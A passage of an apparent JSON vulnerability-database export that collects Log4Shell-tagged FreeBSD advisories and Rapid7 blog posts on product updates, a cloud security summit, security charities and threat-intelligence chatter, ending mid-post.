"2022-02-22T18:00:30", "type": "threatpost", "title": "Xenomorph Malware Burrows into Google Play Users, No Facehugger Required", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-22T18:00:30", "id": "THREATPOST:FC38FE49CDC6DFAD4E78D669DBFA5687", "href": "https://threatpost.com/xenomorph-malware-google-play-facehugger/178563/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:30", "description": "\n\nServiio reports:\n\nServiio is affectred by the log4j vulnerability.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T00:00:00", "type": "freebsd", "title": "serviio -- affected by log4j vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T00:00:00", "id": "1EA05BB8-5D74-11EC-BB1E-001517A2E1A4", "href": "https://vuxml.freebsd.org/freebsd/1ea05bb8-5d74-11ec-bb1e-001517a2e1a4.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-19T15:51:30", "description": "\n\nApache Software Foundation repos:\n\nApache Log4j2 JNDI features do not protect against attacker\n controlled LDAP and other JNDI related endpoints. An attacker\n who can control log messages or paramters can execute arbitrary\n code from attacker-controller LDAP servers when message lookup\n substitution is enabled.\n \n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T00:00:00", "type": "freebsd", "title": "graylog -- include log4j patches", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-10T00:00:00", "id": "3FADD7E4-F8FB-45A0-A218-8FD6423C338F", "href": "https://vuxml.freebsd.org/freebsd/3fadd7e4-f8fb-45a0-a218-8fd6423c338f.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2022-03-09T17:28:27", "description": "\n\nThe world of the cloud never stops moving \u2014 so neither can cloud security. In the face of rapidly evolving technology and a constantly changing threat landscape, keeping up with all the latest developments, trends, and best practices in this emerging practice is more vital than ever.\n\nEnter Rapid7\u2019s [third annual Cloud Security Summit](<https://www.rapid7.com/info/events-2022/rapid7-cloud-security-summit/>), which we\u2019ll be hosting this year on Tuesday, March 29. This one-day virtual event is dedicated to [cloud security best practices](<https://www.rapid7.com/fundamentals/cloud-network-security/>) and will feature industry experts from Rapid7, as well as Amazon Web Services (AWS), Snyk, and more. \n\nWhile the event is fully virtual and free, we know that the time commitment can be the most challenging part of attending a multi-hour event during the workday. With that in mind, we\u2019ve compiled a short list of the top reasons you\u2019ll definitely want to register, clear your calendar, and attend this event.\n\n## Reason 1: Get a sneak peak at some original cloud security research\n\nDuring the opening session of this year\u2019s summit, two members of Rapid7\u2019s award-winning security research team will be presenting some never-before-published research on the current state of cloud security operations, the [most common misconfigurations in 2021](<https://www.rapid7.com/info/2021-cloud-misconfigurations-research-report/>), [Log4j](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>), and more.\n\nAlong with being genuinely interesting data, this research will also give you some insights and benchmarks that will help you evaluate your own [cloud security program](<https://www.rapid7.com/fundamentals/cloud-security/>), and prioritize the most commonly exploited risks in your organization's environment.\n\n## Reason 2: Learn from industry experts, and get CPE credits\n\nAlong with a handful of team member\u2019s from Rapid7\u2019s own cloud security practice, this year\u2019s summit includes a host of subject matter experts from across the industry. You can look forward to hearing from Merritt Baer, Principal in the Office of the CISO at Amazon Web Services; Anthony Seto, Field Director for Cloud Native Application Security at Snyk; Keith Hoodlet, Code Security Architect at GitHub; and more. And that doesn\u2019t even include the InsightCloudSec customers who will be joining to share their expert perspectives as well.\n\nWhile learning and knowledge gain are clearly the most important aspects here, it\u2019s always great to have something extra to show for the time you devoted to an event like this. To help make the case to your management that this event is more than worth the time you\u2019ll put in, we\u2019ve arranged for all attendees to earn 3.5 continuing professional education (CPE) credits to go toward maintaining or upgrading security certifications, such as [CISSP](<https://www.isc2.org/Certifications/CISSP#>), [CISM](<https://www.isaca.org/credentialing/cism/maintain-cism-certification>), and more. \n\n## Reason 3: Be the first to hear exciting Rapid7 announcements\n\nLast but not least, while the event is primarily focused on cloud security research, strategies, and thought leadership, we are also planning to pepper in some exciting news related to [InsightCloudSec](<https://www.rapid7.com/products/insightcloudsec/>), Rapid7\u2019s cloud-native security platform. \n\nWe\u2019ll end the day with a demonstration of the product, so you can see some of our newest capabilities in action. Whether you're already an InsightCloudSec customer, or considering a new solution for uncovering misconfigurations, automating cloud security workflows, shifting left, and more, this is the best way to get a live look at one of the top solutions available in the market today. \n\nSo what are you waiting for? Come join us, and let\u2019s dive into the latest and greatest in cloud security together.\n\n#### Join our 2022 Cloud Security Summit\n\n[Register Now](<https://www.rapid7.com/info/events-2022/rapid7-cloud-security-summit/>)\n\n \n\n\n \n**_Additional reading_**\n\n * _[Cloud Security and Compliance: The Ultimate Frenemies of Financial Services](<https://www.rapid7.com/blog/post/2022/02/17/cloud-security-and-compliance-the-ultimate-frenemies-of-financial-services/>)_\n * _[Stay Ahead of Threats With Cloud Workload Protection](<https://www.rapid7.com/blog/post/2021/12/10/stay-ahead-of-threats-with-cloud-workload-protection/>)_\n * _[InsightCloudSec Supports 12 New AWS Services Announced at re:Invent](<https://www.rapid7.com/blog/post/2021/12/06/insightcloudsec-supports-12-new-aws-services-announced-at-re-invent/>)_\n * _[Kubernetes Guardrails: Bringing DevOps and Security Together on Cloud](<https://www.rapid7.com/blog/post/2021/12/06/kubernetes-guardrails-bringing-devops-and-security-together-on-cloud/>)_", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-09T17:06:13", "type": "rapid7blog", "title": "3 Reasons to Join Rapid7\u2019s Cloud Security Summit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-09T17:06:13", "id": "RAPID7BLOG:45B045D2EE21432DF9939E4402522BFC", "href": "https://blog.rapid7.com/2022/03/09/3-reasons-to-join-rapid7s-cloud-security-summit/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-19T19:35:50", "description": "\n\nThe world of cybersecurity never has a dull moment. While we are still recovering from the aftermath of [Log4Shell](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>), the recent [ContiLeaks](<https://www.rapid7.com/blog/post/2022/03/01/conti-ransomware-group-internal-chats-leaked-over-russia-ukraine-conflict/>) exposed multiple vulnerabilities that have been exploited by the Conti ransomware group. It\u2019s critical for your team to identify the risk posed by such vulnerabilities and implement necessary remediation measures. As you will see, the product updates our vulnerability management (VM) team has made to [InsightVM](<https://www.rapid7.com/products/insightvm/>) and [Nexpose](<https://www.rapid7.com/products/nexpose/>) in the last quarter will empower _you_ to stay in charge \u2014 not the vulnerabilities.\n\nBut that\u2019s not all we\u2019ve improved on. We\u2019ve increased the scope of vulnerabilities tracked by incorporating [CISA\u2019s known exploited vulnerabilities (KEV)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) in the Threat Feed, usability enhancements, targeted reporting and scanning, and Log4Shell mitigation checks. And we\u2019ve released our annual [Vulnerability Intelligence Report](<https://www.rapid7.com/products/insightvm/vulnerability-report-hub-page/>) to help you make sense of the vulns that impacted us last year and understand the trends that we will all be facing this year. Our team also offers practical guidance to help the security teams better protect themselves.\n\nLet\u2019s dive into the key feature releases and updates on the vulnerability management front for Q1 2022.\n\n## [InsightVM] ContiLeaks Helpful Query to easily detect ContiLeaks vulns and ensure compliance\n\nCISA\u2019s KEV catalog is part of the agency\u2019s [binding operative directive](<https://www.cisa.gov/binding-operational-directive-22-01>) that has reporting requirements for federal agencies and civilian contractors. The recent ContiLeaks revealed over 30 vulns that are now a part of CISA\u2019s KEV. While users could always build a query in IVM to identify these vulns, doing so is time-consuming and can be prone to error. The ContiLeaks Helpful Query takes out the manual effort and lets customers easily locate 30+ ContiLeaks vulnerabilities in their environments. When the query is loaded into our Specific Vulnerability Dashboard template, it can give an at-a-glance view of the company\u2019s risk posture as it relates to the Conti threat. In addition to helping customers identify the exploited vulnerabilities in their environment, the update will also help them stay within the bounds of CISA\u2019s operative directive.\n\n\n\n\n\n## [InsightVM] Threat feed dashboard now includes CISA\u2019s KEV catalog\n\nWhile we are on the topic of CISA, you will be excited to learn that we have expanded the scope of vulnerabilities tracked to incorporate CISA\u2019s KEV catalog in the InsightVM [Threat Feed Dashboard](<https://www.rapid7.com/blog/post/2017/06/13/live-threat-driven-prioritization/>), including the **Assets With Actively Targeted Vulnerabilities** card and the **Most Common Actively Targeted Vulnerabilities** card. The CISA inclusion makes it easy to see how exposed your organization is to active threats and inform prioritization decisions around remediation efforts. \n\nWe have also added a new \u201cCISA KEV (known exploited vulnerability)\u201d vulnerability category to allow for more targeted scanning (i.e. scanning the environment for CISA KEV entries only). You can also use the CISA KEV category to filter scan reports.\n\n\n\n## \n\n## [Insight VM and Nexpose] A new credential type to support scanning Oracle Databases by Service Name\n\nInsightVM and Nexpose customers have always been able to scan Oracle databases using SIDs (system identifiers) but were previously unable to provide a Service Name in the credential. This meant a gap in visibility for Oracle databases that could only be accessed via their Service Name. We were not happy with this limitation. Now, you now configure Oracle Database scans to specify a Service Name instead of an SID (you can still use the SID, if you want!) when authenticating. You now have the visibility into a wider range of deployment configurations of Oracle Database and the ability to configure scan using Service Name or SID.\n\n\n\n## [Insight VM and Nexpose] Automatic Scan Assistant credentials generation\n\nLast year, [we introduced Scan Assistant](<https://www.rapid7.com/blog/post/2022/02/18/whats-new-in-insightvm-and-nexpose-q4-2021-in-review/>), which alleviates the credential management (for Scan Engine) burden on vulnerability management teams. For the Scan Assistant to communicate with the Scan Engine, it requires digital certificates to be manually created and deployed on both the target assets and the Nexpose / IVM Security Console. Manually creating the public / private key pair is a complex and error-prone process. \n\nWith this update, we are taking some more burden off the vulnerability management teams. You can now use the Shared Credentials management UI to automatically generate Scan Assistant credentials. This not only reduces the technical expertise and time required to manage Scan Assistant credentials but also makes for a user-friendly experience for you.\n\nLearn more in our recent blog post on [passwordless scanning](<https://www.rapid7.com/blog/post/2021/10/18/passwordless-network-scanning-same-insights-less-risk/>).\n\n\n\n## [Insight VM and Nexpose] Log4Shell mitigation checks\n\nThe product improvements list would be incomplete without an update on Log4Shell.\n\nIf you are vulnerable to Log4Shell, you can edit the JAR files on a system to take out the vulnerable code and thus not get exploited. However, it is difficult to keep a check on this manually. This update adds that extra capability to not only look at the version of Log4j that was present in your environment but also check if it has been mitigated \u2014 i.e., if the vulnerable code is removed.\n\nAuthenticated scans and Agent-based assessments can now determine whether the JNDILookup class removal mitigation for Log4Shell has been applied to Log4j JAR files on Windows systems. This will reduce the number of reports of the vulnerability on systems that are not exploitable. We also added an Obsolete Software vulnerability check for Log4j 1.x, which will let you find obsolete versions of Log4j in your environment.\n\n## Stay in charge\n\nAs always, we hope these updates will make it easier for you to stay ahead of vulnerabilities. \n\nIt almost felt like the quarter might end on a calm note, but then the world of cybersecurity never has a dull moment. The end of the quarter saw Spring4Shell, another zero-day vulnerability in the Spring Core module of Spring Framework. [Learn more about Rapid7 response to this vulnerability](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>) and how we are working around the clock to help our customers protect their own environments from Spring4Shell.\n\n_**Additional reading: **_\n\n * _[InsightVM Release Notes](<https://docs.rapid7.com/release-notes/insightvm/>)_\n * _[Widespread Exploitation of Critical Remote Code Execution in Apache Log4j](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>)_\n * _[The Rapid7 Annual Vulnerability Intelligence Report Webcast](<https://information.rapid7.com/2021_Vuln_Intelligence_Report_WC.html>)_ \n\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-19T17:52:17", "type": "rapid7blog", "title": "What's New in InsightVM and Nexpose: Q1 2022 in Review", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-19T17:52:17", "id": "RAPID7BLOG:ED80467D2D29D8DC10E754C9EA19D9AD", "href": "https://blog.rapid7.com/2022/04/19/whats-new-in-insightvm-and-nexpose-q1-2022-in-review/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-04T19:05:16", "description": "\n\n_**Editor\u2019s note: **We had planned to publish our _[_Hacky Holidays_](<https://www.rapid7.com/blog/series/hacky-holidays/hacky-holidays-2021/>)_ blog series throughout December 2021 \u2013 but then _[_Log4Shell_](<https://www.rapid7.com/blog/post/2021/12/15/the-everypersons-guide-to-log4shell-cve-2021-44228/>)_ happened, and we dropped everything to focus on this major vulnerability that impacted the entire cybersecurity community worldwide. Now that it\u2019s 2022, we\u2019re feeling in need of some holiday cheer, and we hope you\u2019re still in the spirit of the season, too. Throughout January, we\u2019ll be publishing Hacky Holidays content (with a few tweaks, of course) to give the new year a festive start. So, grab an eggnog latte, line up the carols on Spotify, and let\u2019s pick up where we left off._\n\nWhile it's always nice to receive gifts, the holiday season is more about giving \u2013 whether you're buying something nice for the people you love or giving back to the community to help ensure others enjoy the holidays as much as you do.\n\nGiving back is exactly what we'll be focusing on in today's [Hacky Holidays](<https://www.rapid7.com/blog/post/2021/12/02/hacky-holidays-from-rapid7-announcing-our-new-festive-blog-series/>) post, as it's a theme that truly resonates with those in the security industry. From white-hat hackers to those volunteering their time to make the internet a safer, more inclusive space, we've highlighted a few security-related projects that exemplify the spirit of giving back.\n\n## 1\\. The Innocent Lives Foundation\n\n[The Innocent Lives Foundation](<https://www.innocentlivesfoundation.org/>) aims to identify child predators and help bring them to justice. They do this by leveraging the combined power of the information security community to create tools that unmask anonymous child predators online. Then, using the data from Open Source Intelligence and cutting-edge techniques, they build a path to capturing evidence and then pass on those details to law enforcement for them to recreate.\n\nThe Innocent Lives Foundation was first started by Chris Hadnagy, who [joined us on an episode of our Security Nation podcast](<https://www.rapid7.com/blog/post/2020/01/30/how-the-innocent-lives-foundation-uses-osint-to-uncover-predators/>) back in 2020. He worked on a few cases at Social-Engineer, LLC, that tracked and captured predators who trafficked and exploited children. When he saw the impact these crimes had on innocent people, he knew he had to do something about it. As a leader in the information security community, he chose to rally a group of security experts and professionals in the social engineering field to address these problems and prevent crimes against future victims.\n\nThe foundation is serving endangered children and building a world in which all children can live innocent lives. It's difficult, emotionally taxing work, but it's making the world a better place, and it's the perfect example of giving back.\n\nIf you'd like to donate to the cause \u2014 it can cost up to $10,000 to produce one file to send to law enforcement, so donations are needed and welcomed \u2014 you can do so [here](<https://www.innocentlivesfoundation.org/donate/>). Aside from donating, there are numerous other ways to [get involved](<https://www.innocentlivesfoundation.org/get-involved/>), including reporting a case, sharing support online, or even volunteering your security skills when applications are opened.\n\n## 2\\. No More Ransom\n\nToday, ransomware is rampant. This fact won't surprise anyone working in the security industry, but many normal users around the world don't know what ransomware is, how to defend against it, and what to do if they fall victim to a scam. That's where [No More Ransom](<https://www.nomoreransom.org/en/index.html>) comes into play.\n\nNo More Ransom is an initiative by the National High Tech Crime Unit of the Netherlands' police, Europol's European Cybercrime Centre, Kaspersky, and McAfee with a simple mission: to help victims of ransomware retrieve their encrypted data without paying criminals a single dime in the process.\n\nThe initiative aims to achieve this mission in two ways:\n\n 1. By compiling a [repository of keys and applications](<https://www.nomoreransom.org/en/decryption-tools.html>) that can decrypt data locked by different types of ransomware\n 2. By [spreading awareness about ransomware](<https://www.nomoreransom.org/en/ransomware-qa.html>) and educating the world about prevention methods they can employ in their daily lives\n\nWhile it's not always possible to regain access to files encrypted by or systems locked by ransomware, No More Ransom has helped many do exactly that with its repository. And by sharing simple, easy-to-follow cybersecurity advice, the initiative is creating a better informed world of users who understand how to prevent falling victim to ransomware in the first place.\n\nIn the 5 years of since its creation, the [No More Ransom initiative](<https://www.rapid7.com/blog/post/2021/07/26/decrypter-fomo-no-mo-five-years-of-the-no-more-ransom-project/>) has:\n\n * Built a library of 121 free tools\n * Been able to decrypt 151 ransomware families\n * Seen more than 6 million downloads of its tools\n * Prevented $900 million in criminal profit\n\nIf you'd like to do your part, the No More Ransom project is always looking for [new partners](<https://www.nomoreransom.org/en/partners.html>) to spread their messaging, so if your organization wants to be more security-minded and give back to the security community in general, consider joining the list of many partners. If you ever fall victim to ransomware, you can also [report the crime](<https://www.nomoreransom.org/en/report-a-crime.html>), which will help identify new types of ransomware and aid future prevention.\n\n## 3\\. CIAS Gaming\n\nEstablished by the University of Texas at San Antonio, the Center for Infrastructure Assurance and Security (CIAS) conducts research into effective ways to engage students with cybersecurity principles through educational gaming \u2014 and as part of their work, they're making cybersecurity relatable, fun, and engaging for kids.\n\nThe [CIAS Gaming program](<https://cias.utsa.edu/gaming.php>) targets 4 demographics: elementary school, middle school, high school, and colleges and universities. Their mission is to deliver quality research, training, competition, and exercise programs to advance community and organizational cybersecurity capabilities and collaboration.\n\nCurrently, the CIAS K-12 Program consists of a few educational tools. These include:\n\n * A collectible card game and electronic download called [Cyber Threat Defender](<http://cias.utsa.edu/ctd_cards.php>)\n * A multiplayer card game for students in third through fifth grade called [Cyber Threat Protector](<https://cias.utsa.edu/protector.php>)\n * A card game for K-2 players with simple design and reinforced concepts called [Cyber Threat Guardian](<https://cias.utsa.edu/guardian.php>)\n * An electronic game that teaches techniques for encoding and decoding ciphers to hide or discover information called [Project Cipher](<http://cias.utsa.edu/cipher.php>)\n * A testing tool and platform that gives educators a way to create quizzes and introduce students to cybersecurity principles called the [Pyramid of Knowledge](<http://cias.utsa.edu/pyramid.php>)\n * Interactive activities, like activity sheets and games, introduced to kids by the [CyBear cybersecurity mascots](<https://www.cultureofcybersecurity.com/>)\n\nCIAS Gaming is shaping the future of cybersecurity by training the next generation in cybersecurity best practices. You can access and download these tools and games via the links above, or [reach out](<https://cias.utsa.edu/contact.html>) directly to CIAS to learn more about taking part in their competitions or trainings.\n\n## 4\\. The Alliance for Securing Democracy\n\nThe [Alliance for Securing Democracy](<https://securingdemocracy.gmfus.org/>) (ASD) is a nonpartisan initiative housed within the German Marshall Fund of the United States that aims to combat autocratic efforts to undermine and interfere in democratic institutions around the world. The ASD contributes research and analysis on how a range of tools, from cyberattacks and disinformation to support for extremism, are being used to weaken democracies. It also provides public dashboards to expose the effects of online influence networks and the themes being promoted by foreign powers to threaten democratic institutions.\n\nThe ASD is independently funded by more than 175 private individuals and small family foundations across the political spectrum. Its team brings together a diverse staff with expertise across industries, including technology and cybersecurity, to provide research, policy recommendations, and even analysis of key issues and threats. It also has a technical advisory committee that features experts on disinformation, cybersecurity, illicit finance, and more.\n\nThe ASD has conducted a significant amount of work in the area of [cybersecurity](<https://securingdemocracy.gmfus.org/cybersecurity/>). It also has compiled a toolbox to spread awareness on various techniques being used by malign actors. Such tools include:\n\n * [The Authoritarian Interference Tracker](<https://securingdemocracy.gmfus.org/toolbox/authoritarian-interference-tracker/>), which exposes Russia and China's foreign interference activities\n * [The Information Operations Archive](<https://www.io-archive.org/>), which houses data points from known Information Operations\n * [The Hamilton 2.0 Dashboard](<https://securingdemocracy.gmfus.org/hamilton-dashboard/>), which reveals autocracies' state-backed messaging\n\nIn a more globalized and digitalized world, the work ASD is doing to protect the strength of free and open societies by shining a light on autocratic tactics, closing vulnerabilities in democratic systems, and imposing costs on those who undermine our institutions is more important than ever. You can reach them at [info@securingdemocracy.org](<mailto:info@securingdemocracy.org>) or [donate to the cause](<https://contributions.gmfus.org/ASD-Donations>).\n\n## 5\\. Code for Social Good\n\n[Code for Social Good](<https://app.code4socialgood.org/>) is a nonprofit organization that partners with other nonprofit companies to provide the technical help they need to achieve their missions for no cost. It's all about volunteering to promote social good: Code for Social Good has built and fostered a volunteer community that promotes welfare by supporting nonprofits in need. And that global network consists of professionals from across the tech industry, including technical writers, coders, programmers, and more.\n\nWhether you code for fun, experience, social good, or to make a better world, volunteering at Code for Social Good is a great way to give back. Anyone can [sign up](<https://c4sg.auth0.com/login?state=hKFo2SBKaXJWNm4tTWNhQmNTSl9ER2V3Q2h3eHJTRXRHdVpuWKFupWxvZ2luo3RpZNkgMGw5cTQ1OFhyVUhzZkhWa1M2X0hvT3ZsZTNjUFpHNjmjY2lk2SAzMzJEWkFRaVVpWEFYWVlLdnpKeTZFb2R5bFMycnplNQ&client=332DZAQiUiXAXYYKvzJy6EodylS2rze5&protocol=oauth2&response_type=token&scope=openid%20profile%20email%20scope&audience=https%3A%2F%2Fc4sg-api&envars=prod&auth0Client=eyJuYW1lIjoiYXV0aDAuanMiLCJ2ZXJzaW9uIjoiOC44LjAifQ%3D%3D>) as a volunteer, and then, you can browse their [list of projects](<https://app.code4socialgood.org/project/list/projects>). If you find one applicable to your skills, you can apply and wait for contact from the nonprofit. Nonprofits that need help can also [post projects](<https://c4sg.auth0.com/login?state=hKFo2SAxYndhbFFlWENNM3RmYXozb1U5RHhtaHgtSHNteWJlaaFupWxvZ2luo3RpZNkgNHlWZ1MyUGpMeDhRRGdKUzRhRTFGZXNadjktdTRsSTijY2lk2SAzMzJEWkFRaVVpWEFYWVlLdnpKeTZFb2R5bFMycnplNQ&client=332DZAQiUiXAXYYKvzJy6EodylS2rze5&protocol=oauth2&response_type=token&scope=openid%20profile%20email%20scope&audience=https%3A%2F%2Fc4sg-api&envars=prod&auth0Client=eyJuYW1lIjoiYXV0aDAuanMiLCJ2ZXJzaW9uIjoiOC44LjAifQ%3D%3D>) on the site and [find volunteers](<https://app.code4socialgood.org/user/list>) to assist them.\n\nAs of this writing, Code for Social Good has 138 projects posted across 122 organizations based in 87 countries. The current volunteer community consists of 2,595 volunteers, and they're always looking for more help. If you have some extra time, why not take a look and see if you can give back by volunteering your technical skills to a nonprofit in need.\n\nGiving back is an important theme of the holidays and one that's integral to the cybersecurity community. By giving back to the industry, we can encourage a healthy, flourishing practice that spreads awareness, leading to a better, safer, and brighter tomorrow.\n\nIf you're looking for ways to give back, hopefully these examples inspire you to action. If you'd like to stay in the holiday spirit, check out the rest of our [Hacky Holidays](<https://www.rapid7.com/blog/tag/hacky-holidays-2021/>) specials.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-04T18:44:58", "type": "rapid7blog", "title": "5 Security Projects That Are Giving Back", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-04T18:44:58", "id": "RAPID7BLOG:E3D08ECAA9A93569D5544F4D6AAEEB74", "href": "https://blog.rapid7.com/2022/01/04/5-security-projects-that-are-giving-back/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T23:08:05", "description": "\n\nIt's been a long few days as organizations' security teams have worked to map, quantify, and mitigate the immense risk presented by the [Log4Shell vulnerability within Log4j](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>). As can be imagined, cybercriminals are working overtime as well, as they seek out ways to exploit this vulnerability.\n\n#### Need clarity on detecting and mitigating Log4Shell?\n\n[Sign up for our webinar on Thursday, December 16, 2021](<https://www.rapid7.com/about/events-webcasts/brighttalk/524370/>)\n\n \n\n\nThe Rapid7 Threat Intelligence team is tracking the attacker's-eye view and the related chatter on the clear, deep, and dark web within our [Threat Intelligence platform](<https://www.rapid7.com/products/threat-command/>). Here are 4 observations based on what we've seen at the onset of the identification of CVE-2021-44228.\n\n## 1\\. We see a spike in hacker chatter and security researchers' publications about Log4j.\n\n\n\nIncreased hacker chatter is a key indicator of an emerging threat that security teams must account for. Clearly the spike here is no surprise \u2013 however, it is important to monitor and understand the types and scope of the chatter in order to get a clear picture of what's on the horizon.\n\n## 2\\. Hackers \u2013 specifically from the Russian, Chinese, and Turkish communities \u2013 show interest in the vulnerability and are actively sharing scanners and exploits.\n\n\n\nThe following two screenshots show that bad actors have already developed and shared proof of concepts exploiting the vulnerability in Log4j. They also show the extent to which this vulnerability impacts user communities such as PC gamers, social media users, Apple/iCloud customers, and more.\n\nLog4Shell discussion on a Russian cybercrime forumLog4j discussion on a Turkish cybercrime forum\n\n## 3\\. Code with a proof of concept for the exploit has been published on GitHub.\n\n\n\nThe underground cybercrime community functions like any other business model, but what sets it apart is the spirit with which bad actors share their work for mass consumption. The example above is completely open and free for anyone to access and utilize.\n\n## 4\\. 